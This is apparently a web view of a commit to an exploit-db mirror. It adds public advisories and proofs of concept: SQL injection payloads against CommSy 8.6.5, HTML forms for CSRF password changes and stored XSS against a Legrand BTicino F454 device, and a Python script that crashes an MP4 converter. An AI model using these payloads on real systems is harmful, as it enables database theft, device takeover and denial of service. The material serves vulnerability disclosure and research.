bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-05-16

Browse source 
4 changes to exploits/shellcodes

Tomabo MP4 Converter 3.25.22 - Denial of Service (PoC)
CommSy 8.6.5 - SQL injection
Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting
This commit is contained in:
Offensive Security 2019-05-16 05:01:58 +00:00
parent b04843e5cb
commit e8b59f945c
5 changed files with 201 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
exploits/php/remote/46839.rb
View file

@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
'References' => 'References' =>
[ [
['URL', 'http://www.pentest.com.tr/exploits/PHP-Fusion-9-03-00-Edit-Profile-Remote-Code-Execution.html'], # Details ['URL', 'http://www.pentest.com.tr/exploits/PHP-Fusion-9-03-00-Edit-Profile-Remote-Code-Execution.html'], # Details
['URL', 'https://www.php-fusion.co.uk'] ['URL', 'https://www.php-fusion.co.uk'],
['URL', 'https://github.com/php-fusion/PHP-Fusion/commit/943432028b9e674433bb3f2a128b2477134110e6']
], ],
'Platform' => 'php', 'Platform' => 'php',
'Arch' => ARCH_PHP, 'Arch' => ARCH_PHP,

56
exploits/php/webapps/46849.txt Normal file
View file

@ -0,0 +1,56 @@
Title:
======
CommSy 8.6.5 - SQL injection
Researcher:
===========
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
CVE-ID:
=======
CVE-2019-11880
Timeline:
=========
2019-04-15 Vulnerability discovered
2019-04-15 Asked for security contact and PGP key
2019-04-16 Send details to the vendor
2019-05-07 Flaw was approved but will not be fixed in branch 8.6
2019-05-15 Public disclosure
Affected Products:
==================
CommSy <= 8.6.5
Vendor Homepage:
================
https://www.commsy.net
Details:
========
CommSy is a web-based community system, originally developed at the
University of Hamburg, Germany, to support learning/working communities.
We have discovered a unauthenticated SQL injection vulnerability in
CommSy <= 8.6.5 that makes it possible to read all database content. The
vulnerability exists in the HTTP GET parameter "cid".
Proof of Concept:
=================
boolean-based blind:
commsy.php?cid=101" AND 3823=(SELECT (CASE WHEN (3823=3823) THEN 3823
ELSE (SELECT 7548 UNION SELECT 4498) END))-- dGRD&mod=context&fct=login
error-based:
commsy.php?cid=101" AND (SELECT 6105 FROM(SELECT
COUNT(*),CONCAT(0x716a767871,(SELECT
(ELT(6105=6105,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jzQs&mod=context&fct=login
time-based blind:
commsy.php?cid=101" AND SLEEP(5)-- MjJM&mod=context&fct=login
Fix:
====
According to the manufacturer, the version branch 8.6 is no longer
supported and the vulnerability will not be fixed. Customers should
update to the newest version 9.2.

118
exploits/php/webapps/46850.txt Normal file
View file

@ -0,0 +1,118 @@
<!--
Legrand BTicino Driver Manager F454 1.0.51 CSRF Change Password Exploit
Vendor: BTicino S.p.A.
Product web page: https://www.bticino.com
Affected version: Hardware Platform: F454
Firmware version: 1.0.51
Driver Manager version: 1.1.14
Summary: Audio/video web server for the remote control of the
system using web pages or the MY HOME portal. The device can
operate as a gateway for the use of the MHVisual and Virtual
Configurator software - 6 DIN modules. It replaces item F453
and F453AV.
Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.
Tested on: Apache/2.2.14 (Unix)
OpenSSL/1.0.0d
PHP/5.1.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5521
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5521.php
30.04.2019
-->
<!-- CSRF PoC web access password change -->
<html>
<body>
<form action="http://192.168.1.66:8080/system/password.save.php" method="POST">
<input type="hidden" name="password1" value="newpass123" />
<input type="hidden" name="password2" value="newpass123" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<!-- CSRF PoC OpenWebNet password change -->
<html>
<body>
<form action="http://192.168.1.66:8080/system/ownpassword.save.php" method="POST">
<input type="hidden" name="ownpassword" value="ilegnisi" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<!--
Legrand BTicino Driver Manager F454 1.0.51 Authenticated Stored XSS Exploit
Vendor: BTicino S.p.A.
Product web page: https://www.bticino.com
Affected version: Hardware Platform: F454
Firmware version: 1.0.51
Driver Manager version: 1.1.14
Summary: Audio/video web server for the remote control of the
system using web pages or the MY HOME portal. The device can
operate as a gateway for the use of the MHVisual and Virtual
Configurator software - 6 DIN modules. It replaces item F453
and F453AV.
Desc: The application suffers from an authenticated stored XSS
via GET request. The issue is triggered when input passed via
the GET parameter 'server' is not properly sanitized before
being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in
context of an affected site.
Tested on: Apache/2.2.14 (Unix)
OpenSSL/1.0.0d
PHP/5.1.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5522
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5522.php
30.04.2019
-->
<!-- Stored XSS via GET request -->
<html>
<body>
<form action="http://192.168.1.66:8080/system/time.ntp.php">
<input type="hidden" name="mode" value="mine" />
<input type="hidden" name="server" value='"><marquee>Waddup.</marquee>' />
<input type="submit" value="Signal" />
</form>
</body>
</html>
<!-- GET http://192.168.1.66:8080/system/time.ntp.php?mode=mine&server="><marquee>Waddup.</marquee> HTTP/1.1 -->

22
exploits/windows/dos/46848.py Executable file
View file

@ -0,0 +1,22 @@
# -*- coding: utf-8 -*-
# Exploit Title: MP4 Converter 3.25.22 - 'Name' Denial of Service (PoC)
# Date: 14/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.tomabo.com/
# Software: http://www.tomabo.com/downloads/mp4-converter-setup.exe
# Version: 3.25.22
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "MP4Converter.py", it will create a new file "MP4Converter.txt"
# 2.- Copy the text from the generated MP4Converter.txt file to clipboard
# 3.- Open MP4 Converter
# 4.- Select 'Options' > 'Video/Audio Formats'
# 5.- Click 'Add Preset' and paste clipboard in the field 'Name'
# 6.- Click 'OK' and click 'Reset All'
# 7.- Crashed
buffer = "\x41" * 10000
f = open ("MP4Converter.txt", "w")
f.write(buffer)
f.close()

3
files_exploits.csv
View file

@ -6426,6 +6426,7 @@ id,file,description,date,author,type,platform,port
46843,exploits/windows/dos/46843.py,"TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows, 46843,exploits/windows/dos/46843.py,"TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
46844,exploits/windows/dos/46844.py,"TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows, 46844,exploits/windows/dos/46844.py,"TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
46845,exploits/windows/dos/46845.py,"TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows, 46845,exploits/windows/dos/46845.py,"TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
46848,exploits/windows/dos/46848.py,"Tomabo MP4 Converter 3.25.22 - Denial of Service (PoC)",2019-05-15,"Alejandra Sánchez",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -41272,3 +41273,5 @@ id,file,description,date,author,type,platform,port
46841,exploits/hardware/webapps/46841.txt,"D-Link DWL-2600AP - Multiple OS Command Injection",2019-05-14,"Raki Ben Hamouda",webapps,hardware, 46841,exploits/hardware/webapps/46841.txt,"D-Link DWL-2600AP - Multiple OS Command Injection",2019-05-14,"Raki Ben Hamouda",webapps,hardware,
46846,exploits/php/webapps/46846.txt,"Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection",2019-05-14,"Julien Ahrens",webapps,php,80 46846,exploits/php/webapps/46846.txt,"Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection",2019-05-14,"Julien Ahrens",webapps,php,80
46847,exploits/php/webapps/46847.txt,"PasteShr 1.6 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80 46847,exploits/php/webapps/46847.txt,"PasteShr 1.6 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80
46849,exploits/php/webapps/46849.txt,"CommSy 8.6.5 - SQL injection",2019-05-15,"Jens Regel_ Schneider_ Wulf",webapps,php,
46850,exploits/php/webapps/46850.txt,"Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting",2019-05-15,LiquidWorm,webapps,php,

Can't render this file because it is too large.